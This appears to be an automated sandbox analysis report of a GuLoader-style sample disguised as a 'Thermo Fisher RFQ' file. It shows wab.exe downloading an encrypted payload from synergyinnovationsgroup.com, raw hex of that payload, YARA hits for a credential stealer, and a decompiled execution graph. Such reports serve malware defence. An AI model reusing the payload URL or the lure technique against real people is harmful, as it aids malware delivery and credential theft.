                                            Aug 29, 2024 21:56:43.956712961 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.956727028 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.956754923 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.956933975 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.957006931 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.957247972 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.957278013 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.957571983 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.957597971 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.957715034 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.957742929 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.957819939 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.957844973 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.957897902 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.957920074 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.958034039 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.958041906 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.958271980 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.958293915 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.958360910 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.958463907 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.991154909 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.991343021 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.991343021 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.991343021 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.991416931 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.991672039 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.991851091 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.991923094 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.992105961 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.992306948 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.992306948 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.992307901 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.992367029 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:44.071118116 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:44.071559906 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:44.071753979 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:44.071984053 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:44.072083950 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:44.072305918 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:44.072550058 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:44.072582006 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:44.072639942 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:44.072774887 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:44.072829962 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:44.072941065 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:44.073081970 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:44.073081970 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:44.073129892 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:44.073182106 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:44.073183060 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:44.073422909 CEST49838443192.168.11.20199.217.106.226
                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 29, 2024 21:56:42.924117088 CEST5251753192.168.11.201.1.1.1
                                            Aug 29, 2024 21:56:43.117943048 CEST53525171.1.1.1192.168.11.20
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Aug 29, 2024 21:56:42.924117088 CEST192.168.11.201.1.1.10xe420Standard query (0)synergyinnovationsgroup.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Aug 29, 2024 21:56:43.117943048 CEST1.1.1.1192.168.11.200xe420No error (0)synergyinnovationsgroup.com199.217.106.226A (IP address)IN (0x0001)false
                                            • synergyinnovationsgroup.com
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.11.2049838199.217.106.2264432668C:\Program Files (x86)\Windows Mail\wab.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-29 19:56:43 UTC185OUTGET /wPKxzs124.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                            Host: synergyinnovationsgroup.com
                                            Cache-Control: no-cache
                                            2024-08-29 19:56:43 UTC223INHTTP/1.1 200 OK
                                            Date: Thu, 29 Aug 2024 19:56:43 GMT
                                            Server: Apache
                                            Last-Modified: Tue, 27 Aug 2024 22:25:57 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 240192
                                            Connection: close
                                            Content-Type: application/octet-stream
                                            2024-08-29 19:56:43 UTC7969INData Raw: 39 20 72 2a 65 f5 3a 28 8f 05 ac 88 73 00 f1 d4 2e d2 64 de 73 df d7 78 3c b2 d9 95 44 2c f1 fa 0f de 35 cc ba 39 8a c7 22 71 a3 19 37 09 47 96 79 81 2b 5e 7f 58 70 37 b5 dd b9 cf 75 67 00 4c 8b 6b 9e 0b 98 f6 ad c1 27 f8 af 9f 11 1a e4 f2 f5 20 e4 aa b4 74 98 3d b1 fc ea e2 a0 a6 b7 ec 13 51 d7 47 10 21 86 54 37 9a c4 86 38 e1 7f 1f f6 28 8f 32 f3 04 26 3f 7c 8d e3 94 f7 f3 94 c5 ef 2b 08 49 d1 68 2d bb dc 3f 3f 1d 3e 50 92 75 3a 50 26 23 20 e3 17 e8 d8 2d 02 37 d4 cc cd 98 06 a9 70 34 40 15 52 90 24 b9 66 d7 c6 1d de e9 da 2a 2a 14 de 8c b3 48 02 fb 39 2c 7f 36 a7 51 46 66 ef 3d 72 c4 52 de 78 6f 6e cb c8 b2 0f 80 1b 5b f3 1a 87 d6 b2 bb 9d 89 22 2b e4 06 79 dd 93 3a bd e3 ec ad 67 6c 36 4b 48 ab 8a b3 78 2b 59 8e f9 e6 c8 c5 54 fe 56 75 29 d7 1d 45 dd
                                            Data Ascii: 9 r*e:(s.dsx<D,59"q7Gy+^Xp7ugLk' t=QG!T78(2&?|+Ih-??>Pu:P&# -7p4@R$f**H9,6QFf=rRxon["+y:gl6KHx+YTVu)E
                                            2024-08-29 19:56:43 UTC8000INData Raw: 3c 90 06 1b 20 36 70 8f 6b 95 fc 6e 26 eb e3 70 a3 64 b6 36 db 64 1e 31 f3 ab 33 9a 44 54 90 3d 10 7e a9 54 6f a3 07 ce 5b fc 46 7d 5d 4b 40 a3 6f c3 38 a3 2f ae 5d ff 85 83 0d ea 81 f7 b7 a0 13 43 23 9f 1c 41 af e5 44 b9 d5 c3 f6 bb 85 49 5c ea c5 21 7a 2d f7 69 c0 5e 5f 38 3f 0e 0a 1f 53 5e 9b 88 09 12 4f 2b 89 e1 8b b2 4b 54 4e a3 53 6e a7 5b 79 9f 0c 55 ac b8 4d f2 d2 70 dd f5 ae 1d 42 b5 80 65 6e 60 be d8 fb 6e 83 79 c2 39 ba 36 fe f0 0c 27 e9 63 db 37 f1 b9 24 11 35 1b 7e 7c a9 4c 86 de 20 31 bb 52 e1 e3 3b 5b f1 73 9f 04 68 44 75 4a 75 bd ed 10 3b 02 6b f6 84 d7 96 e8 1c e3 6c 8c 87 05 d0 93 44 63 55 02 34 81 91 e0 94 b6 70 e4 3b 58 33 af 11 fa a8 a9 32 7f f5 2b 27 cd f9 50 41 f6 10 1d 47 6d 6c fb 5b 75 82 ed 1e 6c 52 af ab 08 9a de af 54 45 79 7e
                                            Data Ascii: < 6pkn&pd6d13DT=~To[F}]K@o8/]C#ADI\!z-i^_8?S^O+KTNSn[yUMpBen`ny96'c7$5~|L 1R;[shDuJu;klDcU4p;X32+'PAGml[ulRTEy~
                                            2024-08-29 19:56:43 UTC8000INData Raw: 9e 79 ac d0 52 19 c3 61 4f 19 8e 6a aa 9a 3d d8 b8 87 5b 19 5d c9 f8 bf 9a 71 07 79 4b ed 29 c3 79 67 1a bc 8b c9 d9 b5 49 d7 80 c4 76 13 95 5f 98 2c 2d cf be c4 2f 5c 1d 41 bd a5 0b bc 4a f0 97 ea 87 dd ed 21 34 f1 c4 a4 63 24 41 b2 a0 e3 7f 42 05 15 17 d0 91 bf 67 ec 68 b0 b7 ef 76 ba f1 ee f4 e2 95 fd b0 9d 3c bd 6c 54 be 9f 11 c3 a8 fd 93 c2 2f 91 39 2f d6 37 e7 ca 8c 79 f8 f1 28 5b 2c 37 96 35 7c 91 20 39 0b 7f 77 a4 1e 8e 52 5c ae ea 3a b7 6b 31 d1 88 c0 18 d8 ea 86 d4 09 a2 89 17 5b 8a 94 5b 68 47 82 57 d9 1f d4 b4 ae 49 72 fb e3 72 e9 ba 9e 04 cf 63 f5 0e 89 7d e7 ec eb 1a a1 f2 7e 2a de f8 5d 21 5b c9 f3 52 d2 8f 42 36 f2 aa 45 fe 83 e2 49 a8 f0 25 c0 19 7c 15 f9 33 27 cd fa a4 50 01 ac 2f 1f df 10 fa 49 ee 1d 0b 87 fa d1 88 82 ec bf 6a 86 e3 3b
                                            Data Ascii: yRaOj=[]qyK)ygIv_,-/\AJ!4c$ABghv<lT/9/7y([,75| 9wR\:k1[[hGWIrrc}~*]![RB6EI%|3'P/Ij;
                                            2024-08-29 19:56:43 UTC8000INData Raw: 83 e5 2a 91 a1 95 07 d3 f7 f5 03 88 59 8b 18 3c 67 56 2b 10 ba 00 e6 4d 85 01 7f 01 34 49 74 a6 5d 64 91 02 66 ff f2 b7 f7 a7 07 5f 3a 8f 8b 71 d1 22 6c 2d f4 f6 03 8a 75 be 7b eb b7 a3 7c 2f af 6a 50 ae 3d 4d aa 0f ae a6 7c d3 94 f1 58 93 1d 43 dd b9 d0 5f 8f 5b 63 6d 6e a6 0a b9 79 e4 3b f1 f6 35 e5 de 3a c7 16 86 c8 4b 38 7e 36 37 e3 c0 82 1a 2c 49 f4 6d 57 f8 e5 3f a5 49 16 da 9c 69 cb 8f 9f 14 2c 85 a2 a0 9b 6b 96 25 28 8f 69 0d 09 5f 16 3b 2f 5a 14 b8 50 0c fb cb c2 23 f3 2f 85 57 bd ef 2f cc 70 40 5e 8d 64 56 97 b3 b4 55 0f c9 87 3f 17 b8 d3 37 89 7d ca 17 86 b6 46 ef 05 b8 da 23 de 59 fc e1 d1 87 06 78 c0 12 10 91 63 4c 17 65 93 76 3c e1 54 fd 61 d1 fa 43 fe 0e f3 4b 7c 6b a1 10 84 c9 a8 c3 88 b4 01 84 97 b9 51 1e fb ec a4 a1 67 05 fa f1 13 b7 48
                                            Data Ascii: *Y<gV+M4It]df_:q"l-u{|/jP=M|XC_[cmny;5:K8~67,ImW?Ii,k%(i_;/ZP#/W/p@^dVU?7}F#YxcLev<TaCK|kQgH
                                            2024-08-29 19:56:43 UTC8000INData Raw: 3c 67 47 5c 0f 1a c6 23 f7 46 0c 6f 20 ac 87 99 57 69 b6 b2 2e f2 13 2e d6 44 01 2d 1b ee 6e 77 1b f9 14 15 c6 cf 02 01 9b 78 c4 e1 22 f8 af 9f d0 fe e4 f2 4d 08 a6 aa b4 7e 66 31 fb fc 14 ee a2 a6 9f 62 13 51 d1 28 53 21 86 5e c9 94 c7 86 c6 ed 6d 1f d6 29 8f 32 f3 5c d8 31 6e 8d 1d 98 65 f3 6a c9 f0 34 3c 2e ee 5f db 89 02 79 32 51 f3 02 ad 1c 53 25 f8 5d 59 8c 8e 96 b2 40 dc 58 bd a2 d1 ff 62 89 62 3e ce 67 27 f4 70 e5 08 f7 83 72 8c c9 b7 45 c3 39 f0 81 bf bc 28 e8 39 d2 73 25 a7 71 16 23 ef 3d 1e c5 51 de df 75 8d ad c8 b8 92 7e 17 48 f3 75 d7 d6 b0 b0 f9 fc 28 2b e2 58 76 d6 93 cc b1 eb ec df 79 7c 18 84 24 05 8a 93 72 5f 6c 4e fa e7 e8 c4 14 fe 56 d8 61 d7 1d 46 23 17 fe d0 d0 75 3c 1c 1f 5b 37 32 72 a5 fb 4f 68 1e f2 5e a6 54 2d fd 3c ba 00 bf b3
                                            Data Ascii: <gG\#Fo Wi..D-nwx"M~f1bQ(S!^m)2\1nej4<._y2QS%]Y@Xbb>g'prE9(9s%q#=Qu~Hu(+Xvy|$r_lNVaF#u<[72rOh^T-<
                                            2024-08-29 19:56:43 UTC8000INData Raw: ce 81 d7 af 02 33 44 dd 91 15 bf a1 1a 48 b0 2b ef f3 bb a5 49 a2 eb fc ce 7b 14 fd 97 cc 5a 5f e6 30 0e 0a 3f a8 50 9a 88 f7 e2 4a 2a 89 3f 80 bb 4b 74 b5 a2 6a 6b 59 5a 40 b5 09 55 ac cb e9 24 2c 85 dc 05 a3 1d 62 9b 9f 65 6e 94 9a d1 fb 6d 4d 76 cb 57 9b 24 fe f1 0c d9 f9 7a c3 37 f1 b9 24 13 3d 1b b8 2a af 4c 08 b7 e1 df bb 52 c1 c0 28 5b f1 8d 60 33 43 44 75 b4 07 90 ed 30 34 2a 45 f6 7a dc d1 db 1c e3 68 5a a4 07 d0 b1 64 40 55 08 ce af 92 e0 b4 ba 8e ea 3b a6 3d 58 1d fa 56 85 3d 7f d5 24 d9 cc c0 bd 40 cf 31 63 4f 6d 92 f3 61 64 f1 ff 0b 4c 25 87 b0 08 64 da 87 48 45 87 78 dd e8 32 47 e0 ec 92 85 d6 fc dc 54 b1 74 df c2 47 f1 58 42 2e f2 54 fe f8 b2 66 a7 62 17 cf 61 06 1b 12 4f 3c ef 79 ef 89 2b c9 5e e8 85 fe 31 71 0a 44 b4 d2 0f d8 63 a1 1a f2
                                            Data Ascii: 3DH+I{Z_0?PJ*?KtjkYZ@U$,benmMvW$z7$=*LR([`3CDu04*EzhZd@U;=XV=$@1cOmadL%dHEx2GTtGXB.TfbaO<y+^1qDc
                                            2024-08-29 19:56:43 UTC8000INData Raw: a2 cc 92 4c f0 69 1d 8e dd c5 c9 4f 85 c2 cb 09 57 ef b0 5e 9f 51 59 6a 93 1d ad ef 41 6a e1 48 b8 76 ef 76 4e c5 c0 0b 1d 94 2c a0 9d 1c a5 92 59 b7 61 ee ec b2 fd 93 d9 be bf 38 2f fc cd 3a cc 8c 39 90 d7 f5 5b 0c 2e 96 cb 71 67 2e 11 af 7f 89 a2 24 02 8c ce 51 37 2a 49 6a 08 25 85 c8 18 0c dc e1 d4 09 b9 18 3e 5b 8a 9e 79 9a 4b 82 77 c4 3f d2 b4 50 48 b5 d7 e9 72 e9 ba 9b 0e cf 66 8f 7a 89 7d 1d 9f 10 0c a1 82 56 42 ab f8 57 56 d1 c7 f3 56 d2 b5 42 36 f2 aa 45 f4 83 e2 49 a8 fa 25 c0 06 7c 15 f9 33 27 cd e3 a4 50 01 ac 2a 1e df 1a f2 4c ee 1d 4b bc f9 db 88 a2 0e b3 60 86 3d 37 91 3c dd cd ad d8 87 88 29 4a 33 3d f9 88 0f b2 a4 cc 75 de d9 f6 b1 de 78 fe 36 6e 07 dc 34 3c 70 af 96 99 fc 6e f8 eb da 6c a3 16 ad c8 d7 15 bc 7e f7 aa 33 90 9a 5a 91 3d 10
                                            Data Ascii: LiOW^QYjAjHvvN,Ya8/:9[.qg.$Q7*Ij%>[yKw?PHrfz}VBWVVB6EI%|3'P*LK`=7<)J3=ux6n4<pnl~3Z=
                                            2024-08-29 19:56:43 UTC8000INData Raw: ea 49 82 55 39 af 6a ae 51 08 57 aa f1 a2 56 70 49 6a 8c d6 93 3d 56 b2 d0 d1 a1 87 74 72 6d 90 aa fb b7 58 ff 3b 0f fa ca e4 c7 2d c7 16 86 c8 46 0f 69 c8 3b ee 3e 00 73 13 f0 fb 92 a8 de 96 56 a4 49 ee f4 83 69 cb 71 6d 15 2d a5 b6 5e 97 6a 68 04 3b 93 69 0d f7 a0 23 29 2f 35 3d 46 5c 06 db ba df 22 f3 16 0b 3e bc ef 09 f9 5b 40 5e 73 94 57 96 b3 4a a7 0c c8 a7 1d 15 b8 d3 c9 76 45 e4 05 86 b6 66 99 6d b9 da a8 15 57 fc e0 0f 8a 0c 78 e0 ef 1e 90 63 b2 e7 66 92 76 e2 f0 5b fd 41 37 fb 7a e9 f0 f2 72 99 67 a1 10 09 12 ad c3 ae c2 68 85 97 97 d2 01 fb ea 5a 51 60 04 da e8 ed bb 49 a2 12 47 57 4a 86 bc e2 68 49 c2 97 8f ff 8c 0b aa be 1e 70 8b 56 b9 8e 80 81 92 7f 8c f9 62 00 c3 ef b0 2c ab 6a 82 a8 c3 d1 b2 79 72 6a 29 37 f4 b2 e8 2d 0a 79 3b ed d1 c3 79
                                            Data Ascii: IU9jQWVpIj=VtrmX;-Fi;>sVIiqm-^jh;i#)/5=F\">[@^sWJvEfmWxcfv[A7zrghZQ`IGWJhIpVb,jyrj)7-y;y
                                            2024-08-29 19:56:43 UTC8000INData Raw: 37 cb 4a 15 1d 5f 7b a7 ec 13 51 29 4a 0d 21 78 42 3e 9a c4 9d 57 c6 7f 1f fc f4 fc 2e f2 04 2c 19 82 81 eb 94 18 68 94 c5 eb ca bc 59 d1 e4 e8 72 fd 87 c0 5c ed 71 ee 82 53 23 0c ad 5c 87 70 64 b5 4b 22 74 b6 a2 a3 f7 52 88 12 51 60 47 24 fe 04 d0 7b ea 83 52 87 37 b9 49 4e 8f fc 8d be 2d 38 fa 39 26 57 29 a6 51 1c dd e1 30 3e 3b 5d d3 df 7d 23 ad c8 b2 56 a0 1a 5b f3 1a 3f 5b f4 ba 96 89 d7 25 ea a6 5a dd 93 32 bd 1d e2 a2 67 4c 18 f4 4b ab 74 9d 68 2b 2b 75 f8 e6 b8 3b 1a ef 56 75 29 d7 1d 47 23 17 f8 d0 5d 12 29 1c 39 a5 39 21 72 7b f7 43 68 e0 d6 ff a6 74 27 60 c2 b6 ea b3 d1 2a 52 b1 b0 63 54 8e 50 72 2b 3d b8 d6 08 99 7f f7 32 74 64 09 27 89 64 25 9e 8f ed 45 d8 a0 95 01 f3 6a d5 d3 88 a7 85 59 32 67 a8 27 31 ba 20 f5 4d 7b 0f 93 00 35 57 74 a6 5d
                                            Data Ascii: 7J_{Q)J!xB>W.,hYr\qS#\pdK"tRQ`G${R7IN-89&W)Q0>;]}#V[?[%Z2gLKth++u;Vu)G#])99!r{Cht'`*RcTPr+=2td'd%EjY2g'1 M{5Wt]
                                            2024-08-29 19:56:43 UTC8000INData Raw: 08 55 aa 46 79 2f 2c e0 a4 0b a2 17 9f 9b 9f 65 6e 4c 49 d8 fb 6d b3 84 ce 51 bb 16 ff f1 0c 27 a0 bd d5 31 f1 47 d6 19 35 e5 4a 22 a8 23 1e df de 3b 9b 53 c1 e0 3b 02 cf 70 60 c2 b5 ba 79 4b 0b b3 cd 17 3f 2a 45 08 8a d0 e8 cd e2 ef 65 a4 88 01 d0 99 c4 be 54 3b 3e a1 95 e0 6a ba 8f ea 11 78 36 51 1d fa 56 87 39 7f f5 d5 d5 c1 c0 63 44 f6 10 63 b1 6c 55 6e 62 64 83 cd 3e 4c 55 af 26 4c 64 d0 ae 71 95 37 73 e4 c7 e5 35 1f cc 88 7b d8 fe 22 7a a8 74 df 3c c6 bc 58 62 22 d7 84 4f 07 b3 5b 81 ef 17 cf 53 81 ea ee b0 e2 ed 79 ef fa 41 c6 57 ee 7b 0e 39 78 d7 6a a7 d2 0f fe 63 ac 22 e5 37 fe 66 b2 13 af 33 d4 8f 46 f5 df fa bc 55 9c ba 5d b3 f7 49 02 99 60 dc 17 3c 67 4a ab 03 71 68 4c 6f 4d 35 28 00 ac 87 67 5b 9f b4 6c 22 fb 13 41 86 45 61 1e 4a 1a 91 88 fe
                                            Data Ascii: UFy/,enLImQ'1G5J"#;S;p`yK?*EeT;>jx6QV9cDclUnbd>LU&Ldq7s5{"zt<Xb"O[SyAW{9xjc"7f3FU]I`<gJqhLoM5(g[l"AEaJ


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:15:55:12
                                            Start date:29/08/2024
                                            Path:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"
                                            Imagebase:0x400000
                                            File size:605'160 bytes
                                            MD5 hash:9768C048C979AEEEEB051574D452B626
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.87355602773.00000000072D9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:15:56:35
                                            Start date:29/08/2024
                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"
                                            Imagebase:0xe0000
                                            File size:516'608 bytes
                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.91557808162.0000000037C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:23.3%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:16.1%
                                              Total number of Nodes:1585
                                              Total number of Limit Nodes:44
                                              execution_graph 4049 401bc0 4050 401c11 4049->4050 4051 401bcd 4049->4051 4053 401c16 4050->4053 4054 401c3b GlobalAlloc 4050->4054 4052 4023af 4051->4052 4058 401be4 4051->4058 4055 406591 21 API calls 4052->4055 4062 401c56 4053->4062 4087 406554 lstrcpynW 4053->4087 4068 406591 4054->4068 4057 4023bc 4055->4057 4057->4062 4088 405bb4 4057->4088 4085 406554 lstrcpynW 4058->4085 4061 401c28 GlobalFree 4061->4062 4064 401bf3 4086 406554 lstrcpynW 4064->4086 4066 401c02 4092 406554 lstrcpynW 4066->4092 4070 40659c 4068->4070 4069 4067e3 4071 4067fc 4069->4071 4115 406554 lstrcpynW 4069->4115 4070->4069 4073 4067b4 lstrlenW 4070->4073 4074 4066ad GetSystemDirectoryW 4070->4074 4075 406591 15 API calls 4070->4075 4079 4066c3 GetWindowsDirectoryW 4070->4079 4080 406755 lstrcatW 4070->4080 4082 406591 15 API calls 4070->4082 4084 406725 SHGetPathFromIDListW CoTaskMemFree 4070->4084 4093 406422 4070->4093 4098 406948 GetModuleHandleA 4070->4098 4104 406802 4070->4104 4113 40649b wsprintfW 4070->4113 4114 406554 lstrcpynW 4070->4114 4071->4062 4073->4070 4074->4070 4075->4073 4079->4070 4080->4070 4082->4070 4084->4070 4085->4064 4086->4066 4087->4061 4090 405bc9 4088->4090 4089 405c15 4089->4062 4090->4089 4091 405bdd MessageBoxIndirectW 4090->4091 4091->4089 4092->4062 4116 4063c1 4093->4116 4096 406486 4096->4070 4097 406456 RegQueryValueExW RegCloseKey 4097->4096 4099 406964 4098->4099 4100 40696e GetProcAddress 4098->4100 4120 4068d8 GetSystemDirectoryW 4099->4120 4102 40697d 4100->4102 4102->4070 4103 40696a 4103->4100 4103->4102 4111 40680f 4104->4111 4105 406885 4106 40688a CharPrevW 4105->4106 4108 4068ab 4105->4108 4106->4105 4107 406878 CharNextW 4107->4105 4107->4111 4108->4070 4110 406864 CharNextW 4110->4111 4111->4105 4111->4107 4111->4110 4112 406873 CharNextW 4111->4112 4123 405e50 4111->4123 4112->4107 4113->4070 4114->4070 4115->4071 4117 4063d0 4116->4117 4118 4063d4 4117->4118 4119 4063d9 RegOpenKeyExW 4117->4119 4118->4096 4118->4097 4119->4118 4121 4068fa wsprintfW LoadLibraryExW 4120->4121 4121->4103 4124 405e56 4123->4124 4125 405e6c 4124->4125 4126 405e5d CharNextW 4124->4126 4125->4111 4126->4124 5201 404f40 GetDlgItem GetDlgItem 5202 404f92 7 API calls 5201->5202 5208 4051b7 5201->5208 5203 405039 DeleteObject 5202->5203 5204 40502c SendMessageW 5202->5204 5205 405042 5203->5205 5204->5203 5206 405079 5205->5206 5209 406591 21 API calls 5205->5209 5210 4044d3 22 API calls 5206->5210 5207 405345 5212 40534f SendMessageW 5207->5212 5219 405357 5207->5219 5211 405299 5208->5211 5232 405226 5208->5232 5255 404e8e SendMessageW 5208->5255 5213 40505b SendMessageW SendMessageW 5209->5213 5214 40508d 5210->5214 5211->5207 5216 4052f2 SendMessageW 5211->5216 5244 4051aa 5211->5244 5212->5219 5213->5205 5215 4044d3 22 API calls 5214->5215 5233 40509e 5215->5233 5222 405307 SendMessageW 5216->5222 5216->5244 5217 40528b SendMessageW 5217->5211 5218 40453a 8 API calls 5223 405546 5218->5223 5224 405370 5219->5224 5225 405369 ImageList_Destroy 5219->5225 5229 405380 5219->5229 5221 4054fa 5230 40550c ShowWindow GetDlgItem ShowWindow 5221->5230 5221->5244 5227 40531a 5222->5227 5228 405379 GlobalFree 5224->5228 5224->5229 5225->5224 5226 405179 GetWindowLongW SetWindowLongW 5231 405192 5226->5231 5238 40532b SendMessageW 5227->5238 5228->5229 5229->5221 5248 4053bb 5229->5248 5260 404f0e 5229->5260 5230->5244 5234 405197 ShowWindow 5231->5234 5235 4051af 5231->5235 5232->5211 5232->5217 5233->5226 5237 4050f1 SendMessageW 5233->5237 5239 405174 5233->5239 5241 405143 SendMessageW 5233->5241 5242 40512f SendMessageW 5233->5242 5253 404508 SendMessageW 5234->5253 5254 404508 SendMessageW 5235->5254 5237->5233 5238->5207 5239->5226 5239->5231 5241->5233 5242->5233 5244->5218 5245 4054c5 5246 4054d0 InvalidateRect 5245->5246 5249 4054dc 5245->5249 5246->5249 5247 4053e9 SendMessageW 5252 4053ff 5247->5252 5248->5247 5248->5252 5249->5221 5269 404e49 5249->5269 5251 405473 SendMessageW SendMessageW 5251->5252 5252->5245 5252->5251 5253->5244 5254->5208 5256 404eb1 GetMessagePos ScreenToClient SendMessageW 5255->5256 5257 404eed SendMessageW 5255->5257 5258 404ee5 5256->5258 5259 404eea 5256->5259 5257->5258 5258->5232 5259->5257 5272 406554 lstrcpynW 5260->5272 5262 404f21 5273 40649b wsprintfW 5262->5273 5264 404f2b 5265 40140b 2 API calls 5264->5265 5266 404f34 5265->5266 5274 406554 lstrcpynW 5266->5274 5268 404f3b 5268->5248 5275 404d80 5269->5275 5271 404e5e 5271->5221 5272->5262 5273->5264 5274->5268 5277 404d99 5275->5277 5276 406591 21 API calls 5278 404dfd 5276->5278 5277->5276 5279 406591 21 API calls 5278->5279 5280 404e08 5279->5280 5281 406591 21 API calls 5280->5281 5282 404e1e lstrlenW wsprintfW SetDlgItemTextW 5281->5282 5282->5271 5283 402641 5284 402dcb 21 API calls 5283->5284 5285 402648 5284->5285 5288 406044 GetFileAttributesW CreateFileW 5285->5288 5287 402654 5288->5287 4143 4025c3 4154 402e0b 4143->4154 4147 4025d6 4148 402953 4147->4148 4149 4025f2 RegEnumKeyW 4147->4149 4150 4025fe RegEnumValueW 4147->4150 4151 40261a RegCloseKey 4149->4151 4150->4151 4152 402613 4150->4152 4151->4148 4152->4151 4155 402dcb 21 API calls 4154->4155 4156 402e22 4155->4156 4157 4063c1 RegOpenKeyExW 4156->4157 4158 4025cd 4157->4158 4159 402da9 4158->4159 4160 406591 21 API calls 4159->4160 4161 402dbe 4160->4161 4161->4147 5289 404643 lstrlenW 5290 404662 5289->5290 5291 404664 WideCharToMultiByte 5289->5291 5290->5291 5292 4049c4 5293 4049f0 5292->5293 5294 404a01 5292->5294 5353 405b98 GetDlgItemTextW 5293->5353 5295 404a0d GetDlgItem 5294->5295 5302 404a6c 5294->5302 5298 404a21 5295->5298 5297 4049fb 5300 406802 5 API calls 5297->5300 5301 404a35 SetWindowTextW 5298->5301 5306 405ece 4 API calls 5298->5306 5299 404b50 5303 404cff 5299->5303 5355 405b98 GetDlgItemTextW 5299->5355 5300->5294 5307 4044d3 22 API calls 5301->5307 5302->5299 5302->5303 5308 406591 21 API calls 5302->5308 5305 40453a 8 API calls 5303->5305 5310 404d13 5305->5310 5311 404a2b 5306->5311 5312 404a51 5307->5312 5313 404ae0 SHBrowseForFolderW 5308->5313 5309 404b80 5314 405f2b 18 